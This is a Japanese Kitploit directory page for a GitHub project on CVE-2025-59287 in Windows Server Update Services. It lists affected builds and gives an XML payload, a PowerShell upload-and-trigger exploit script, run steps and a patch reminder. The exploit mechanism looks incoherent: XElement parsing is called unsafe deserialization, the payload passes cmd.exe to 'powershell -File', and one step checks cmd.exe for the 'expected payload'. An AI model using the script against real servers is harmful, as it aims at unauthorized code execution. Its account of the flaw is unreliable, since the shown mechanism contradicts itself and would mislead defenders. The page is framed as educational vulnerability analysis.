Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Breaking-the-Update-Chain-Inside-CVE-2025-59287-and-the-WSUS-RCE-Threat — CVE-2025-59287の技術的分析と概念実証エクスプロイト。Windows Server Update Servicesにおける安全でない逆シリアル化による重大なRCEであり、影響を受けるビルドと緩和策を含む。 | Kitploit
ツール/GitHubGitHub/mrk336/breaking-the-update-chain-inside-cve-2025-59287-and-the-wsus-rce-threat
脆弱性分析エクスプロイトウェブアプリケーション悪用論文と研究学習と教育
GitHubmrk336/breaking-the-update-chain-inside-cve-2025-59287-and-the-wsus-rce-threat

Breaking-the-Update-Chain-Inside-CVE-2025-59287-and-the-WSUS-RCE-Threat

CVE-2025-59287の技術的分析と概念実証エクスプロイト。Windows Server Update Servicesにおける安全でない逆シリアル化による重大なRCEであり、影響を受けるビルドと緩和策を含む。

リポジトリを見る
310ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Breaking-the-Update-Chain-Inside-CVE-2025-59287-and-the-WSUS-RCE-Threat

CVE-2025-59287 は、Windows Server Update Services (WSUS) における、信頼できないデータの安全でない逆シリアル化に起因する重大な RCE 脆弱性です。認証なしでリモート攻撃者が任意のコードを実行できる可能性があります。活発な悪用が確認されているため、緊急のパッチ適用が推奨されます。

CVE‑2025‑59287 – Windows Server Update Services (WSUS) におけるリモートコード実行の脅威

By Mark Mallia


概要

Microsoft の Windows Server Update Services (WSUS) は、すべての Microsoft Windows Server プラットフォームにおけるパッチ管理の基盤です。WSUS は Microsoft の更新カタログから更新プログラムを取得し、検証して、ネットワーク内のすべてのサーバーに配信します。CVE‑2025‑59287 として識別されるこの脆弱性は、WSUS 内部の安全でない逆シリアル化ルーチンを悪用し、攻撃者が更新フィードに任意の XML コンテンツを注入できるようにします。WSUS はソースパスやコマンドデータの検証なしにペイロードを処理するため、攻撃者は任意のファイル名とパスを指定でき、ターゲットサーバー上で完全なリモートコード実行を引き起こすことができます。

これが重要な理由:

  • 9.8 の CVSS スコアは、重大度の範囲に分類されます。
  • 攻撃者に必要なのはネットワーク接続のみで、権限昇格は不要です。
  • すでに実環境での悪用が確認されており、ベンダーパッチが適用されるまで、パッチ未適用のシステムはすべて潜在的な標的となります。

影響を受ける Windows Server ビルド

製品バージョン影響を受けるビルド
Windows Server 20126.2.9200.0 – < 6.2.9200.25728
Windows Server 2012 R26.3.9600.0 – < 6.3.9600.22826
Windows Server 201610.0.14393.0 – < 10.0.14393.8524
Windows Server 201910.0.17763.0 – < 10.0.17763.7922
Windows Server 202210.0.20348.0 – < 10.0.20348.4297
Windows Server 202510.0.26100.0 – < 10.0.26100.6905
Windows Server 23H210.0.25398.0 – < 10.0.25398.1916

(お使いの環境が異なるパッチビルドの場合は、それに応じて範囲を調整してください。)


エクスプロイトの仕組み

  1. WSUS はリモートソースから UpdateStream.xml という XML ファイルを取得します。
  2. サービスはこのファイルを System.Xml.Linq.XElement で逆シリアル化します。
  3. 攻撃者は <SourcePath> 要素に任意の値を配置できます。この値は絶対パスとしてディスクに書き込まれます。
  4. <Command> タグ内のコンテンツは、WSUS がストリームを処理する際に PowerShell によって実行され、完全なリモートコード実行が可能になります。

以下は、脆弱なサーバーにアップロードする XML ペイロードです。

root@kitploit:~
<?xml version="1.0" encoding="utf-8"?>
<UpdateStream>
  <Metadata>
    <Title>WSUS Exploit</Title>
    <Description>Injected by local attacker.</Description>
  </Metadata>
  <SourcePath>C:\Windows\System32\cmd.exe</SourcePath>
  <Command><![CDATA[
      powershell -NoProfile -ExecutionPolicy Bypass `
          -File C:\Windows\System32\cmd.exe
  ]]></Command>
</UpdateStream>

サンプル PowerShell エクスプロイトスクリプト

以下のスクリプトは、XML ペイロードを生成し、HTTP PUT 経由で WSUS インスタンスにアップロードし、トラブルシューティング用のログファイルを残します。

root@kitploit:~
# --------------------------------------------------
#  File:   wsus‑exploit.ps1
#  Purpose: Generate malicious UpdateStream.xml,
#           upload it to the WSUS server,
#           trigger the feed.
# --------------------------------------------------

param (
    [string]$TargetUrl = 'http://wsus.example.com/UpdateStream.xml',
    [int]    $Port      = 80,
    [string] $XmlFile   = '.\payload.xml'
)

function Build-Xml {
    param ([string]$file)
    $xmlContent = @"
<?xml version="1.0" encoding="utf-8"?>
<UpdateStream>
  <Metadata>
    <Title>WSUS exploit</Title>
    <Description>Injected by local attacker.</Description>
  </Metadata>
  <SourcePath>C:\Windows\System32\cmd.exe</SourcePath>
  <Command><![CDATA[
      powershell -NoProfile -ExecutionPolicy Bypass `
          -File C:\Windows\System32\cmd.exe
  ]]></Command>
</UpdateStream>
"@
    Set-Content -Path $file -Value $xmlContent
}

# Build the XML payload
Build-Xml -file $XmlFile

# Upload via HTTP PUT
Invoke-WebRequest -Uri $TargetUrl `
                  -Method Put `
                  -InFile $XmlFile `
                  -OutFile 'upload.log'

Write-Host "Upload complete – WSUS should now process the stream."

実行すべき具体的な手順

  1. ビルドの確認 – 各 Windows Server で winver.exe を実行し、ビルドが上記の範囲内にあることを確認します。
  2. エクスプロイトスクリプトの展開 – wsus‑exploit.ps1 を WSUS インスタンスに到達可能なマシンにコピーし、異なるパスやポートを使用する場合は $TargetUrl を変更します。
  3. 実行と監視 – スクリプトを実行します。数分後、各ターゲットサーバーに C:\Windows\System32\cmd.exe ファイルが存在し、期待されるペイロードが含まれていることを確認します。
  4. Microsoft は 2025 年 10 月 24 日にこの脆弱性に対する帯域外パッチをリリースしました。2012 以降の Windows Server バージョンで WSUS を実行している場合は、この更新プログラムが環境に適用されていることを再確認してください。10 月の Patch Tuesday リリースではこの問題を完全には解決できなかったため、このパッチには特に注意を払う価値があります。

倫理的な使用のみ

ここで提供される情報およびエクスプロイトコードは、教育目的のみを対象としています。ご自身の WSUS 環境に対してこのテストを実行する許可があることを確認し、本番システムに変更を展開する際は、該当するすべてのセキュリティベストプラクティスガイドラインに従ってください。

ツールをダウンロード